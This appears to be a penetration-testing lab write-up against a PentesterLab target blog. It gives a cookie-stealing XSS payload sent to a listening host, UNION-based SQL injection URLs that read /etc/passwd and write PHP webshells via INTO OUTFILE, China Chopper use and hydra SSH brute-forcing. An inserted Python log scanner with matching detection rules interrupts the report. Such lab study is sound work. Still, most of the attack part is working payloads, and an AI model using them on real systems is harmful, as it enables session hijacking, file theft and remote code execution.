Experiment report five

For the SQL injection target machine attack process, refer to:

https://pentesterlab.com/exercises/from_sqli_to_shell/course

http://www.sohu.com/a/126855490_472906

For the XSS target machine attack process, refer to:

https://pentesterlab.com/exercises/xss_and_mysql_file/course

Open the web page on the 192.168.165.129 machine; it is a blog system.

Below each blog title, visitors can leave a comment:

Test whether there is an XSS vulnerability.

It is found that there is a pop-up box after submitting:

Then construct the following payload:

<script>document.write('<img src="http://192.168.179.142/?'+document.cookie+' "/>');</script> 
At the same time, listen on port 80 with nc on the 192.168.165.1298 machine.

Log in to the admin account on the original machine; the password is p4ssw0rd.

Log in to view the comment thread just posted.

Then check the content received by nc.

The cookie information is obtained.

Copy the cookie, open the page where the comment is located, and change the cookie value to the one just copied.

Refresh the page and find that you are now logged in as admin.

After entering the management interface, a SQL injection vulnerability is found in the blog editing interface.

http://192.168.165.129/admin/edit.php?id=4 union select 1,2,3,4

Columns 2 and 3 are displayed on the page.

http://192.168.165.129/admin/edit.php?id=0 union select 1,2,load_file("/etc/passwd"),4

The passwd file can be read, but the shadow file cannot. Next, try whether a file can be created.

On the edit page, I found an error message that reveals the /var/www/classes directory.

When viewing the page source, I found that there is a css directory.

After trying it out, the /var/www/css directory turns out to be writable.

So construct the statement:

http://192.168.165.129/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22

then open

http://192.168.165.129/css/s.php

which shows:

This means that the s.php file was successfully written to the /var/www/css directory. Next, write the following into z.php:

<?php system($_GET['c']); ?>

by constructing the URL:

http://192.168.165.129/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22

Access z.php and use uname -a to get system information; commands can be executed remotely.

Next, write a one-line webshell (一句话木马) by constructing the URL:

http://192.168.165.129/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22

Connect with China Chopper (菜刀):
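As an added defensive example (not part of the original report), the script below scans constructed Apache access-log lines modelled on the requests above, URL-decodes each query string and flags the UNION SELECT, load_file, INTO OUTFILE and PHP-from-a-static-directory patterns; the client IP, timestamps and user agent are made up.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache combined-format log lines that mirror the requests in
# this report; the client IP, timestamps and user agent are made up.
SAMPLE_LOG = """\
192.168.165.1 - - [10/May/2023:10:01:09 +0800] "GET /admin/edit.php?id=4%20union%20select%201,2,3,4 HTTP/1.1" 200 2390 "-" "Mozilla/5.0"
192.168.165.1 - - [10/May/2023:10:02:15 +0800] "GET /admin/edit.php?id=0%20union%20select%201,2,load_file(%22/etc/passwd%22),4 HTTP/1.1" 200 4011 "-" "Mozilla/5.0"
192.168.165.1 - - [10/May/2023:10:03:40 +0800] "GET /admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22 HTTP/1.1" 200 2390 "-" "Mozilla/5.0"
192.168.165.1 - - [10/May/2023:10:03:55 +0800] "GET /css/z.php?c=uname%20-a HTTP/1.1" 200 144 "-" "Mozilla/5.0"
192.168.165.1 - - [10/May/2023:10:04:01 +0800] "GET /css/style.css HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Each rule is matched against the URL-decoded, lowercased query string:
# matching the raw line would miss "%20union%20select".
RULES = [
    ("sqli-union",     re.compile(r"\bunion\b\s+(all\s+)?select\b")),
    ("sqli-readfile",  re.compile(r"\bload_file\s*\(")),
    ("sqli-writefile", re.compile(r"\binto\s+(out|dump)file\b")),
    ("php-webshell",   re.compile(r"<\?php|\bsystem\s*\(|\beval\s*\(")),
]
# A .php file served from a static-asset directory is the written shell being
# used; such directories should not be writable by the MySQL user at all.
SHELL_PATH_RE = re.compile(r"^/(css|js|images)/[^/]+\.php$")

def classify(line):
    """Return the names of all rules that one access-log line triggers."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group("path"))
    # Decode twice so double-encoded payloads are seen as the database saw them.
    query = unquote_plus(unquote_plus(parts.query)).lower()
    hits = [name for name, rx in RULES if rx.search(query)]
    if SHELL_PATH_RE.match(parts.path):
        hits.append("php-in-static-dir")
    return hits

def scan(log_text):
    """Return (ip, path, hits) for every line that triggers at least one rule."""
    alerts = []
    for line in log_text.splitlines():
        hits = classify(line)
        if hits:
            m = LOG_RE.match(line)
            alerts.append((m.group("ip"), m.group("path"), hits))
    return alerts
```

Feeding the real access log through scan() gives the same (ip, path, hits) tuples; the write-file and php-in-static-dir hits are the ones worth paging on, since they mean the web root was writable by the database user.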

Earlier I found that the machine has SSH enabled, so I brute-forced it with hydra:

SSH login:
